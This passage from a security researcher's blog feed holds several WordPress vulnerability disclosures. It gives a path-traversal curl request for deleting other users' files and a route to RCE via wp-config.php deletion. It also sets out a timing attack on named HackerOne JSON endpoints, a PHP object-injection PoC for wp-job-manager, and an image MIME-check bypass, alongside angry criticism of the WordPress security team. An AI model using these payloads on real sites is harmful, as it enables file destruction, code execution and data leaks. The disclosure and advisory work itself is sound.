too. Check the not patched DoS issue. Check the obscure updates from <a href="https://core.trac.wordpress.org/ticket/39309">Scott Arciszewski</a>. Check the REST API… (fuck I haven’t reported this one yet O_o). <br>Conclusion is the following: Neither one of the severe issues that are result of BROKEN core are fixed, neither bounty is given and H1 and its personal are used only as tool for silencing researchers and delaying of patches! Neither one time WP “security” team have requested help from anyone for applying patch under normal conditions! They “cooperate” while they steal from you (rant master and PR person show) or when split credits for nothing (PR person fence).</p><h4>Gang: security team</h4><p>Security team as PR peson states it counts 50+ persons. They are some faces from wp community (selling them self as wp security experts), but also there are people from some of the acceptable companies, not everyone is welcomed there (there are millions installs plugins that doesn’t have anyone there, but there are ones who “sponsor” camps and place silent patches before an others — it is open source morons )! As some of them state: “If it is reported isn’t 0day”, which is absolute truth! This means my fellow hosting providers, plugin and theme developers that you are loosing e.g. you are always step back with your competition if they have their own member there or are close with someone from the gang! This means, they have a year at least advantage to apply best security practices in their products, gain huge advantage, lowering their costs and building their brands!</p><h4>C&amp;C server: centralized update server</h4><p>Here there isn’t too much need to be spoken. This system is used to push updates for their (gang) own sites, for their broken themes and plugins, while the rest are leaved to face their destiny: ban from wordpress repository and hard wiping from news outlets (regarding outlets there are some information&#39;s yet to be revealed… ). Regarding “security” of the web sites, please note that updates aren’t push everywhere at the same time, they go step by step. What do you think, is there some order maybe? Can update system be abused from someone to reach your infrastructure? :)</p><h4>WordPress community — cracked</h4><p>Many people have faced the arrogance and egoism from WordPress security and core team. They feel the pain, the know the place is getting centralized, they know it will be worst than it is. They know their word isn’t heard from anyone. They know that good intentions are always abused by them. They know when wp “authorities” are kind there is something much more…</p><p>That is why cracks in the community are obvious. There is first promising fork of the WordPress — <a href="https://www.classicpress.net/">ClassicPress</a>. There are few another I’m aware of that are preparing for action! I know there is a “core” group ready for coup… Interesting times ahead of us and no, it isn’t your fault, go continue be yourself on some of the upcoming forks, new projects or maybe on refreshed WordPress!</p><h4>Sorry!</h4><p>No song…</p><h4>Advice</h4><p>In case you want to increase your WP systems security you can get few points from above. I would advice to track in details fixes that are pushed by WP puppets, always have dummy / honeypot wp instance (for updates and attacks) and never trust words and empty promises!</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a30d312b4fb4" width="1" height="1"><hr><p><a href="https://medium.com/websec/when-punters-fail-they-hide-in-the-ghetto-a30d312b4fb4">When punters fail they hide in the ghetto</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Wordpress 4.9.7 — RCE via Author]]></title>
            <link>https://medium.com/websec/wordpress-4-9-7-rce-via-author-a970cbc520c7?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/a970cbc520c7</guid>
            <category><![CDATA[php]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[wordpress]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Wed, 01 Aug 2018 11:54:51 GMT</pubDate>
            <atom:updated>2018-08-03T12:12:01.932Z</atom:updated>
            <content:encoded><![CDATA[<p>EDIT: <em>Wordpress 4.9.8 is vulnerable too e.g. wasn’t security release.</em></p><p>Wordpress have suffered from <a href="https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/">Arbitrary file deletion that leads towards RCE</a>. In our lovely relationship with WP <a href="https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/">PR person</a> I have stated quite clearly that <a href="https://hackerone.com/reports/291878">offered solution isn’t good</a> at all and in his style confirmed the time frame (one month v.s. his six months) when I’ll tell him why solution isn’t good. Also I had written a <a href="https://medium.com/websec/wordpress-4-9-7-and-evil-author-with-scotch-bd77a83ac39c">little teaser</a> regarding the release where low severity of the issue is presented, but there is one interesting paragraph that says:</p><blockquote>How the vulnerability was fixed? With words: limit the file deletion only for the same folder and make sure thumbnail isn’t used by another media file e.g. check if there is media file with the same name.</blockquote><h4>The Question</h4><p>How is the folder location retrieved? It is taken from the $file variable and we have:</p><pre>$file = get_attached_file( $post_id );</pre><p>and in get_attached_file we discover that it is taken from _wp_attached_file meta value. <br>This value is placed as input in the wp_delete_attachment_files function and in this function we have the following:</p><pre>$thumbdir  = path_join( $uploadpath[&#39;basedir&#39;], dirname( $file ) );</pre><p>and continues towards</p><pre>wp_delete_file_from_directory( $thumbfile, $thumbdir )</pre><h4>Known facts</h4><p>From everything above and from the past we know the following:</p><ul><li>we can <a href="https://medium.com/websec/wordpress-4-9-7-and-evil-author-with-scotch-bd77a83ac39c">delete files as thumbnails</a> from same folder that aren’t used by another media file</li><li>There is <a href="https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/">raw input</a> for _wp_attached_file meta value</li><li>Folder is delivered by realpath from dirname($file)</li><li>From PHP specification dirname doesn’t bother with file system, but it is string manipulation function</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*qKk9Qy0Fy5OsNsO3MxeEKw.jpeg" /><figcaption>So scotch WP, many rakia bypass</figcaption></figure><h4>Conclusion e.g. why fix isn’t good and issue exists</h4><p>Any author on any Wordpress system could set any value for _wp_attached_file which will be concatenated with upload directory =&gt; we can reach the WP root directory depending of the setup e.g. ../../../readme.txt . Then if we set ../../../wp-config.php for thumb value from any input we are in the same situation like in WP 4.9.6 e.g. RCE with Author role.</p><h4>What is next</h4><p>Now core team has complete freedom to apply correct patch towards WP and this <a href="https://github.com/rapid7/metasploit-framework/pull/10247">metasploit module</a> needs to be updated. Also, my dear bug bounty hunters, feel free fill some reports :)</p><h4>Dear WordPress I will always lovz ju ❤</h4><iframe src="https://cdn.embedly.com/widgets/media.html?src=https%3A%2F%2Fwww.youtube.com%2Fembed%2Faj0KmlucsAQ%3Ffeature%3Doembed&amp;url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3Daj0KmlucsAQ&amp;image=https%3A%2F%2Fi.ytimg.com%2Fvi%2Faj0KmlucsAQ%2Fhqdefault.jpg&amp;key=a19fcc184b9711e1b4764040d3dc5c07&amp;type=text%2Fhtml&amp;schema=youtube" width="640" height="480" frameborder="0" scrolling="no"><a href="https://medium.com/media/60af095d6b2b82cbd07d00a6e567cad6/href">https://medium.com/media/60af095d6b2b82cbd07d00a6e567cad6/href</a></iframe><h4>Promo</h4><p>If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a970cbc520c7" width="1" height="1"><hr><p><a href="https://medium.com/websec/wordpress-4-9-7-rce-via-author-a970cbc520c7">Wordpress 4.9.7 — RCE via Author</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Wordpress ≥ 4.9.7 and evil author with scotch]]></title>
            <link>https://medium.com/websec/wordpress-4-9-7-and-evil-author-with-scotch-bd77a83ac39c?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/bd77a83ac39c</guid>
            <category><![CDATA[marketing-strategies]]></category>
            <category><![CDATA[scotch]]></category>
            <category><![CDATA[wordpress]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[theft]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Mon, 09 Jul 2018 12:06:58 GMT</pubDate>
            <atom:updated>2018-07-09T20:45:31.981Z</atom:updated>
            <content:encoded><![CDATA[<p>Recently Wordpress suffered from <a href="https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/">authenticated arbitrary file deletion vulnerability</a>. The vulnerability (probably calculated as low severity) was hanging 7 months and after the disclosure they rushed to fix it with their <a href="https://twitter.com/aaroncampbell">PR agent</a> guiding the process, known in the past for his decisions to <a href="https://medium.com/websec/wp-job-manager-1-29-2-preauth-poi-unserialize-of-user-supplied-data-d90eafa6923b">steal credits from researchers</a> and to pass them towards persons he likes at the moment! This time was close, he just split the credits. Well done, you are doing tremendous work for Wordpress. Now lets go towards fix and vulnerability!</p><h4>The Fix</h4><p>We will go trough the fix, but as they said (PR fixes security issues), it was so scotch!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/579/1*eXnTaBOpHTYTwW5mzr74VA.png" /><figcaption>much security, very wisdom, so scotch ❤</figcaption></figure><p>How the vulnerability was fixed? With words: limit the file deletion only for the same folder and make sure thumbnail isn’t used by another media file e.g. check if there is media file with the same name.</p><p><a href="https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd">Here</a> and <a href="https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd#diff-1aebe3e8c1a195297174731f43493918">here</a>.</p><h4>The scotch problem</h4><p>When someone (security team at this moment) is working on patching the Wordpress core then they must know the fact that Wordpress as CMS has built in few user roles and its api allows user capabilities. This means that when they apply some solution, the fact that permission escalation is possible must be always taken into consideration. Also, they need to know that file system is also storage, in the same way how DB is storage.</p><p>So, they introduce (left intact) possibility for any `author` user to delete any file under the upload directory where he has access.</p><h4>Attack</h4><pre>curl &#39;<a href="http://localhost/wpm/scotch/wp-admin/post.php?post=22&amp;action=editattachment&amp;_wpnonce=4a7fa1365b&#39;">http://localtarget.scotch/wp-admin/post.php?post=[media_file_id]&amp;action=editattachment&amp;_wpnonce=[wpnonce]&#39;</a> -H &#39;Accept-Encoding: gzip, deflate, br&#39; -H &#39;Accept-Language: en-US,en;q=0.8&#39; -H &#39;Upgrade-Insecure-Requests: 1&#39; -H &#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36&#39; -H &#39;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8&#39; -H &#39;Cache-Control: max-age=0&#39; -H &#39;Cookie: [your-authentication-cookies]&#39; -H &#39;Connection: keep-alive&#39; -d &#39;thumb=../07/so-scotch.png&#39; --compressed</pre><ul><li>[media_file_id] is media id</li><li>[wpnonce] is the nonce used for edit form under “wp-admin/post.php?post=[media_file_id]&amp;action=edit”</li><li>[your_authentication_cookies] — cookies…</li><li>thumb = ../07/so-scotch.png is a demo attack vector how to trick the “another thumbnail usage check” and to escalate your permissions and to delete media file that doesn’t belong to you and is used on the wp instance.</li></ul><h4>Mitigation</h4><p>Always pay the author users for their work and be careful with scotch.</p><h4>Promo</h4><p>If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=bd77a83ac39c" width="1" height="1"><hr><p><a href="https://medium.com/websec/wordpress-4-9-7-and-evil-author-with-scotch-bd77a83ac39c">Wordpress ≥ 4.9.7 and evil author with scotch</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Fixed lvl GoatPress]]></title>
            <link>https://medium.com/websec/fixed-lvl-goatpress-4ef45c288193?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/4ef45c288193</guid>
            <category><![CDATA[security]]></category>
            <category><![CDATA[wordpress]]></category>
            <category><![CDATA[php]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Mon, 11 Jun 2018 21:38:24 GMT</pubDate>
            <atom:updated>2018-06-11T22:24:18.918Z</atom:updated>
            <content:encoded><![CDATA[<p>Wordpress have fixed <a href="https://ahussam.me/Leaking-WordPress-CSRF-Tokens/">flash upload vulnerability</a>, but do they?</p><p>I won’t write too much regarding wp druids (security team), but I’ll make clear that after 11 months the issue remains not patched, while the fix is obviously trivial. So, this disclosure is more than <a href="https://en.wikipedia.org/wiki/Responsible_disclosure">responsible disclosure</a> (if wp team member click on the link to get the idea behind <a href="https://en.wikipedia.org/wiki/Responsible_disclosure">responsible disclosure</a>).</p><h4>Vulnerability description</h4><p>Wordpress handles the content verification for images via wp_check_filetype_and_ext function. There we have the following:</p><ol><li>First it takes the mime and extension from file extension via wp_check_filetype</li><li>Then checks for real mime $real_mime = wp_get_image_mime( $file );</li><li>The protection comes here: if ( $real_mime &amp;&amp; $real_mime != $type ) { This means if we are able to make wp_get_image_mime function to return false we have a bypass if fileinfo extension check returns something else like application/octet-stream which will be found in $allowed = get_allowed_mime_types(); =&gt; ext and type will be taken from extension check at the beginning :)</li></ol><p>Let we check!</p><ol><li>Regarding SWF format type we have the following information from the specification:</li></ol><pre>0x5a, 0x57, 0x53 (“ZWS”). A ZWS indicates that the entire file after the first 8 bytes (that is,<br>after the FileLength field) was compressed by using the LZMA open standard: http://www.7-zip.org/sdk.html. ZWS file compression is permitted in SWF 13 or later only.</pre><p>2. getimagesize and exif_imagetype functions used in wp_get_image_mime function at PHP level they use php_getimagetype PHP function in order to get the image type, but from the php source<a href="https://github.com/php/php-src/blob/master/ext/standard/image.c#L45"> image.c</a> we can notice that from the SWF formats, only &quot;CWS&quot; and &quot;FWS&quot; are known for this function, but not the &quot;ZWS&quot; format. This means that getimagesize [&quot;meta&quot;] value and exif_imagetype will return false/empty value as image type.</p><h4>Attack surface</h4><p>Content above teach us valuable lesson and it means that any dangerous format which isn’t detected by PHP via php_getimagetype function and not recognized by fileinfo (application/octet-stream) or recognized with mime type application/ and found in get_allowed_mime_types() will mean upload of dangerous content with valid image extension.</p><h4>Affected PHP versions</h4><ul><li>PHP 5.x will allow upload of SWF file in ZWS format with image extension.</li><li>PHP 5.x and 7.x will allow PDF format with image extension</li><li>PHP 5.x and 7.x will allow any format playable in browser player with image extension</li></ul><h4>Teaser for researchers</h4><p>If you craft fake PNG file with following contentZWS0ftypqtblablablaPNG/giberish... and you try it against any PHP version fileinfowhat will be mime type returned? :)</p><h4>Why this happened and why disclosing this way</h4><p>It happened simply because someone wasn’t following <a href="http://php.net/manual/en/function.getimagesize.php">advice</a> given on the official PHP documentation and lack of QA team and average security testing. Disclosure come this way due the fact that Wordpress security team doesn’t practice responsible disclosure and they were thinking that prolonging the fix will lower the impact (<a href="https://kinsta.com/blog/php-versions/">PHP 5.6</a> and Flash). All of this is absolutely covered by #respectthefounders platform because they haven’t employed any mechanism to protect the researchers being harassed. I have placed a bet against H1 support (request mediation) that beside the words of wp sec team they will not deliver fix in 3 months after 5 months spent and I won. Got a fidget spinner and a lovely t-shirt :D :D :D</p><h4>Promo</h4><p>If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=4ef45c288193" width="1" height="1"><hr><p><a href="https://medium.com/websec/fixed-lvl-goatpress-4ef45c288193">Fixed lvl GoatPress</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[JSON endpoints without tokens doesn’t leak they whisper]]></title>
            <link>https://medium.com/websec/json-endpoints-without-tokens-doesnt-leak-they-whisper-dfe2d5d09267?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/dfe2d5d09267</guid>
            <category><![CDATA[csrf]]></category>
            <category><![CDATA[api]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[timing-attacks]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Tue, 22 May 2018 15:29:40 GMT</pubDate>
            <atom:updated>2018-05-22T16:01:38.600Z</atom:updated>
            <content:encoded><![CDATA[<p>Exploiting interesting feature in HTML5 <a href="https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API/Using_the_Resource_Timing_API">https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API/Using_the_Resource_Timing_API</a> more precise Copy with CORSwe can perform low cost, precise and effective CSRF attacks against GrapQL JSON endpoints where we can learn some information from the system that is under attack, for instance we can count / estimate number of records in the response. This is crucial information for some types of systems where knowledge about existence of one record in some filtered query is crucial for the user that is victim.</p><p>Lets jump to the details!</p><h4>Short</h4><p>You need 3 endpoints. First one which will always (rare changes) return the same content for every users on the system and holds ~10KB data. Second one which will always return empty response (size is constant for all of the users too). From those two endpoints we determine the speed of the victim towards server side at the very same moment, and if we know the timing towards endpoint 3 (under attack)+ we know the speed at that particular time, if we measure each JSON encoded record average size =&gt; we have the count of the records.</p><h4>Detailed</h4><p>PoC platform will be HackerOne and due the fact they know and acknowledge the issue here I’ll dump the information needed in order to understand the attack.</p><ol><li>report ID on the platform is incremental. =&gt; We can measure the number of reports submitted towards platform from one known report ID towards another. Very valuable info for later stages.</li><li>When user is not logged in and loads some json endpoint that requires user authentication, http 400 code will be returned. That causes attacking &lt;img&gt; tag not to be loaded e.g. timing attack to make it impossible =&gt; we can remote determine if user is logged in on HackerOne or not. Very valuable info for later stages.</li></ol><p>Now we know how to travel trough the time (via report_id) and we can remotely with one request to determine if victim is logged in.</p><ol><li>Need to have HackerOne profile in order to find vulnerable endpoints</li><li>Need to find 3 interesting endpoints with the following characteristics: <br> <br><strong>(2.1)</strong> Endpoint that holds valuable data as number of triaged + critical reports where report id nolds XYZTRA numbers ( you can determine time of the report via report id ) (<a href="https://hackerone.com/bugs.json?text_query=4&amp;subject=&amp;sort_type=pg_search_rank&amp;substates%5B%5D=triaged">https://hackerone.com/bugs.json?text_query=4&amp;subject=&amp;sort_type=pg_search_rank&amp;substates%5B%5D=triaged</a>) <br><strong>(2.2)</strong> Endpoint that returns minimal response and could be considered equal with empty response (<a href="https://hackerone.com/bugs.json?text_query=999999&amp;subject=&amp;sort_type=pg_search_rank&amp;substates%5B%5D=triaged">https://hackerone.com/bugs.json?text_query=999999&amp;subject=&amp;sort_type=pg_search_rank&amp;substates%5B%5D=triaged</a>) <br><strong>(2.3)</strong> Endpoint that will hold decent amount of data (~10KB) and that data is not changed very often in order to eliminate/lower server side processing difference from the equation (<a href="https://hackerone.com/programs/search.json?query=IBB&amp;sort=published_at%3Adescending&amp;page=1">https://hackerone.com/programs/search.json?query=IBB&amp;sort=published_at%3Adescending&amp;page=1</a>)</li><li>Minimal 2.2 and targeted 2.1 endpoints need to have same/similar server side complexity ( 2.1 with empty text_query is much faster than 2.2. with text_query = 999999999 )</li><li>On stable and descent internet connection calculate the following: <br> <strong>(4.1)</strong> Average time of loading 2.2 and 2.3 <br> <strong>(4.2)</strong> AVG_TIME(2.3) — AVG_TIME(2.2) = AVG_TIME_DATA_ONLY(2.3) <br> <strong>(4.3)</strong> SPEED_ME (B per ms) = (SIZE(2.3) — SIZE(2.2))/AVG_TIME_DATA_ONLY(2.3) this is the speed towards HackerOne infrastructure. <br> <strong>(4.4)</strong> Monitoring many different responses with the same form as 2.1 we can calculate each json record average size — we can call it ONE_JSON ~ 850B ( this calculation must be based from the response side perspective due the fact it is traveling gzip-ed ) <br> <strong>(4.5)</strong> Calculate the average time of loading 2.1 AVG_TIME(2.1) and AVG_TIME(2.1) — AVG_TIME(2.2) = AVG_TIME_DATA_ONLY(2.1) <br> <strong>(4.6)</strong> SPEED_ME * AVG_TIME_DATA_ONLY(2.1) = SIZE_DATA_ONLY(2.1) and if you divide with ONE_JSON it will give number of records.</li></ol><p>This procedure and calculations could be performed offline e.g. attacker needs only measured times against those 3 interesting endpoints and calculations could be performed later.</p><p>This approach gives more than good results e.g. simple average values, but sometimes due browser / internet latency some tests are failing e.g. give weird values. Those sets of data is also good data and we can learn a lot from it. See the sample!</p><p>My endpoint <a href="https://hackerone.com/bugs.json?text_query=4&amp;subject=&amp;sort_type=pg_search_rank&amp;substates%5B%5D=triaged&amp;rnd=GG1526245410G291">https://hackerone.com/bugs.json?text_query=4&amp;subject=&amp;sort_type=pg_search_rank&amp;substates%5B%5D=triaged&amp;rnd=GG1526245410G291</a> gives 5 records, but in one particular measurement my miner script gave me -1 records. If we visualize it</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1020/1*kJJarHNfF0V1JWoCz5Hc4w.png" /></figure><p>Now from the image if more than obvious that some of the requests timings are adding noise to the end result. Simple clean up e.g. considering:</p><ol><li>Big request — green &gt; 1600</li><li>Small request — red &lt; 750</li><li>Attack endpoint — yellow &lt; 900</li></ol><p>Now we got</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dGKYB4iGy6-7JRpaKE8Ipg.png" /></figure><p>e.g. average calculation will return back the correct number of records ~5.</p><p>This way I have proved that any remote attacker could measure the number of reports from certain type in given time interval that party/user under attack has.</p><h4>Exploitation</h4><p>JSON endpoints that are returning HTTP response code != 200 for not logged in users are telling you if user is logged in or not. This means if you find a way to measure the internet speed of the victim (see details) via endpoints with known output (minimal and big) then getting conclusions based on counting from attacking / interesting endpoints is more than easy. I have prepared already a very effective attack scripts, so if you want to check your own api, say hello and I can help.</p><h4>Advisory</h4><p>Add CSRF tokens even on GET API endpoints if you host sensitive data and you don’t want remote attacking party to be able to count victim records. Never use incremental ID values that could be used as time travelers and make sure always to return HTTP 200 status code.</p><h4>Why disclosing?</h4><p>Due the fact I got permission to do it, H1 thinks leaking this info doesn’t have any impact (I disagree because I don’t want with remember me for two weeks functionality some website to know number of my reports from certain type, rewards,… ) and due the fact it was marked Duplicate with 4 years old issue, plus <a href="https://twitter.com/Hacker0x01/status/994987768513101824">https://twitter.com/Hacker0x01/status/994987768513101824</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=dfe2d5d09267" width="1" height="1"><hr><p><a href="https://medium.com/websec/json-endpoints-without-tokens-doesnt-leak-they-whisper-dfe2d5d09267">JSON endpoints without tokens doesn’t leak they whisper</a> was originally published in <a href="https://medium.com/websec">websec</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[wp-job-manager ≤ 1.29.2 preauth POI / unserialize of user supplied data]]></title>
            <link>https://medium.com/websec/wp-job-manager-1-29-2-preauth-poi-unserialize-of-user-supplied-data-d90eafa6923b?source=rss----ab3c0cf4637---4</link>
            <guid isPermaLink="false">https://medium.com/p/d90eafa6923b</guid>
            <category><![CDATA[wordpress]]></category>
            <category><![CDATA[security]]></category>
            <category><![CDATA[php]]></category>
            <category><![CDATA[woocommerce]]></category>
            <category><![CDATA[wp-job-manager]]></category>
            <dc:creator><![CDATA[slavco]]></dc:creator>
            <pubDate>Fri, 02 Mar 2018 13:30:10 GMT</pubDate>
            <atom:updated>2018-03-09T22:34:52.022Z</atom:updated>
            <content:encoded><![CDATA[<p>Wordpress has gone trough interesting period of time. They have tried to fix critical vulnerabilities:</p><ul><li><a href="https://hackerone.com/reports/179920">https://hackerone.com/reports/179920</a></li><li><a href="https://medium.com/websec/wordpress-sqli-bbb2afcc8e94">https://medium.com/websec/wordpress-sqli-bbb2afcc8e94</a></li></ul><p>in the Wordpress core via <a href="https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/">public writings</a> and <a href="https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html">dummy PR</a>, but security issues need to be solved by tech persons and their advice should be considered <a href="https://medium.com/websec/wordpress-4-8-3-wrecking-ball-b172e2511fad">regarding the facts</a> and not regarding the number of followers on social media.</p><p>Despite all of the advice&#39;s and tries (see h1 report and my medium writings) security team of Wordpress doesn’t recognize any of the issues and now all of us need to handle the consequences of their decisions.</p><p>Fix of the database abstraction library introduced 3 new vulnerabilities in the Wordpress core and the first one e.g. PHP object injection resulted with 2 critical vulnerabilities in quite popular wordpress plugins managed by Automattic:</p><ul><li><a href="https://blog.ripstech.com/2018/woocommerce-php-object-injection/">https://blog.ripstech.com/2018/woocommerce-php-object-injection/</a></li><li>1.29.3 Fix: When retrieving job listing results, cache only the post results and not all of WP_Query (@jom; props slavco) <a href="https://wordpress.org/plugins/wp-job-manager/#developers">https://wordpress.org/plugins/wp-job-manager/#developers</a></li></ul><p>Here I’ll explain the PHP object injection that was introduced in wp-job-manager quite popular WP plugin with 100k active installs holding valuable data on the server side as resumes from candidates that apply for certain job.</p><h4>The issue</h4><p>In the wp-job-manager-functions.php function get_job_listings we have the following:</p><pre>$cached_query = true;</pre><pre>if ( false === ( $result = get_transient( $query_args_hash ) ) ) {</pre><pre>$result = new WP_Query( $query_args );</pre><pre>$cached_query = false;</pre><pre>set_transient( $query_args_hash, $result, DAY_IN_SECONDS );</pre><pre>}</pre><p>e.g. it will create hash from user $_REQUEST input, will create the WP_Query object and will cache it in the database. But as we know from the <a href="https://medium.com/websec/wordpress-4-8-3-wrecking-ball-b172e2511fad">warning</a> if you serialize data structure that holds esc_sql value in it, when inserted into DB will result with damaged serialized string, but also if attacker careful crafts its payload, it will result with Object Injection e.g. unserialize of user supplied data!</p><h4>More details</h4><p>If we visit jobs listing / search page and use it, the following request will be issued:</p><pre>curl &#39;<a href="http://localhost/wpm/wrt/index.php/jm-ajax/get_listings/&#39;">http://localhost/wpm/wrt/index.php/jm-ajax/get_listings/&#39;</a> -H &#39;Cookie: wordpress_test_cookie=WP+Cookie+check&#39; -H &#39;Origin: <a href="http://localhost&#39;">http://localhost&#39;</a> -H &#39;Accept-Encoding: gzip, deflate, br&#39; -H &#39;Accept-Language: en-US,en;q=0.8&#39; -H &#39;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36&#39; -H &#39;Content-Type: application/x-www-form-urlencoded; charset=UTF-8&#39; -H &#39;Accept: */*&#39; -H &#39;Referer: <a href="http://localhost/wpm/wrt/index.php/jobs/&#39;">http://localhost/wpm/wrt/index.php/jobs/&#39;</a> -H &#39;X-Requested-With: XMLHttpRequest&#39; -H &#39;Connection: keep-alive&#39; --data &#39;lang=&amp;search_keywords=attack%25%25%25keyword&amp;search_location=test+location&amp;filter_job_type%5B%5D=freelance&amp;filter_job_type%5B%5D=full-time&amp;filter_job_type%5B%5D=internship&amp;filter_job_type%5B%5D=part-time&amp;filter_job_type%5B%5D=temporary&amp;filter_job_type%5B%5D=&amp;per_page=10&amp;orderby=featured&amp;order=DESC&amp;page=1&amp;show_pagination=false&amp;form_data=search_keywords%3Dattack%2525%2525%2525keyword%26search_location%3Dtest%2Blocation%26filter_job_type%255B%255D%3Dfreelance%26filter_job_type%255B%255D%3Dfull-time%26filter_job_type%255B%255D%3Dinternship%26filter_job_type%255B%255D%3Dpart-time%26filter_job_type%255B%255D%3Dtemporary%26filter_job_type%255B%255D%3D&#39; --compressed</pre><p>as you can notice from the request I have set up attack%%%keyword as keyword and test location as location. This results with transient in the DB (it is in the options table) and there we have the serialized WP_Query object. If we inspect the serialized object we will notice the following:</p><pre>...s:376:&quot;wp_posts.post_title LIKE &#39;%attack\\%\\%\\%keyword%&#39;&quot;;}}s:9:&quot;tax_query&quot;;O:12:&quot;WP_Tax_Query&quot;:6:{s:7:&quot;queries&quot;;a:0:{}s:8:&quot;relation&quot;;s:3:&quot;AND&quot;;s:16:&quot;�*�table_aliases&quot;;a:0:{}s:13:&quot;queried_terms&quot;;a:0:{}s:13:&quot;primary_table&quot;;s:8:&quot;wp_posts&quot;;s:17:&quot;primary_id_column&quot;;s:2:&quot;ID&quot;;}s:10:&quot;meta_query&quot;;O:13:&quot;WP_Meta_Query&quot;:9:{s:7:&quot;queries&quot;;a:2:{i:0;a:4:{i:0;a:3:{s:3:&quot;key&quot;;s:29:&quot;geolocation_formatted_address&quot;;s:5:&quot;value&quot;;s:13:&quot;test location&quot;;...</pre><p>As you can notice s:376:&quot;... there are not 376 characters between &quot; and PHP will continue to count towards 376 and will stop looking for &quot; character, but also you can notice that after this serialized property there is another serialized property that says s:13:”test location” e.g. this is the place where we can craft out payload and to make this damaged serialized object into “good” serialized object that will fulfill attackers needs.</p><h4>Exploit</h4><p>At the moment I can see from the stats that update process is more than bad on the wp-job-manager plugin and instead to dump here full working exploit I’ll referrer towards this PoC code:</p><pre>function goatgoat(){</pre><pre>global $wpdb;</pre><pre>$arr = array(<br>&quot;o\&quot;ne&quot;,<br>&quot;%two&quot;,<br>&quot;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxtr1\&quot;;i:2;s:1:\&quot;!\&quot;;}&quot;<br>);</pre><pre>$arr = esc_sql($arr);</pre><pre>$arr = wp_unslash($arr);</pre><pre>$payload = $wpdb-&gt;remove_placeholder_escape(maybe_serialize($arr));</pre><pre>echo &quot;&lt;pre&gt;&quot;;<br>print_r(unserialize($payload));<br>exit;</pre><pre>}<br>add_action(&quot;init&quot;, &quot;goatgoat&quot;);</pre><h4>What is the attack surface?</h4><p>Attack surface is quite huge because unknown attacker could attack:</p><ul><li>Underling PHP version via unserialize exploit</li><li>To look for POI gadget chain that will allow RCE, SQLi, XSS!</li><li>Recreation of serializedWP_Query object that will hold XSS payload in it!</li><li>Maybe there is default SSRF in the WP core somewhere, m?</li></ul><h4>Advice</h4><p>Share this information in order this information to reach the owners of WP instances where this plugin is applied due the nature of data they hold on their server side in order to update the plugin ASAP.</p><h4>Finding vulnerabilities like this one</h4><p>You can find vulnerability like this one with simple static analysis of source code against some WP plugin / theme:</p><ul><li>look for set_transcient function</li><li>If data structure (array or object) is saved there you are step close to find POI in the plugin</li><li>If data structure holds esc_sql value in it and there is another user input after it, there you are, report security issue!</li></ul><h4>You are welcome</h4><p>I would like to give credits towards wp-job-manager development team! They have solved the issue quite fast and rewarded me a bounty on the h1 (<a href="https://hackerone.com/reports/308489">report will become public in few days</a>).</p><iframe 